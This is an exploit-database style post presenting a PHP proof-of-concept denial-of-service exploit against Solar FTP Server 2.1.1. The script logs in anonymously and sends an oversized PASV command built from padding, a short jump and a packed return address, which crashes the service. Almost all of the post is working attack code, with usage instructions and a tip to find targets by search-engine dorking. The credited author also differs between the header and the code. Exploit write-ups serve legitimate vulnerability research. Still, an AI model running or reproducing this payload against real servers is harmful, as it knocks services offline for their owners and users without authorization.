============================================================================================================================================= | # Title : Solar FTP Server 2.1.1 PASV Command - Denial of Service vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://www.exploit-db.com/apps/b604f672086663c6c97bfe0f10156f19-solarftps-setup.exe | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Solar FTP Server version 2.1.1 remote denial of service exploit. [+] save code as poc.php. [+] Usage = C:\www>php 2.php 127.0.0.1 21 [+] PayLoad : \n"; exit(0); } $ip = $argv[1]; if ($argc > 2) { $platform = $argv[2]; } $ret = pack('L', 0x7C9572D8); $padding = str_repeat("\x43", 468); $junk = str_repeat("\x43", 1532); $frontpad = str_repeat("\x41", 100) . "\xEB\x30" . str_repeat("\x41", 21); $payload = $frontpad . $ret . $padding . $junk; echo "[+] Solar FTP 2.1.1 PASV - Denial of Service - DoS\n[+] Author: Fernando Mengali\n"; echo "[+] Connecting to $ip\n"; $socket = fsockopen($ip, 21, $errno, $errstr, 30); if (!$socket) { echo "[-] Connection to $ip failed!\n"; exit(0); } echo "[+] Exploiting\n"; echo "[*] Sending payload to command PASV...\n"; fwrite($socket, "USER anon\r\n"); fread($socket, 1024); fwrite($socket, "PASS anon\r\n"); fread($socket, 1024); fwrite($socket, "PASV " . $payload . "\r\n"); echo "[+] Done - Exploited\n"; fclose($socket); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================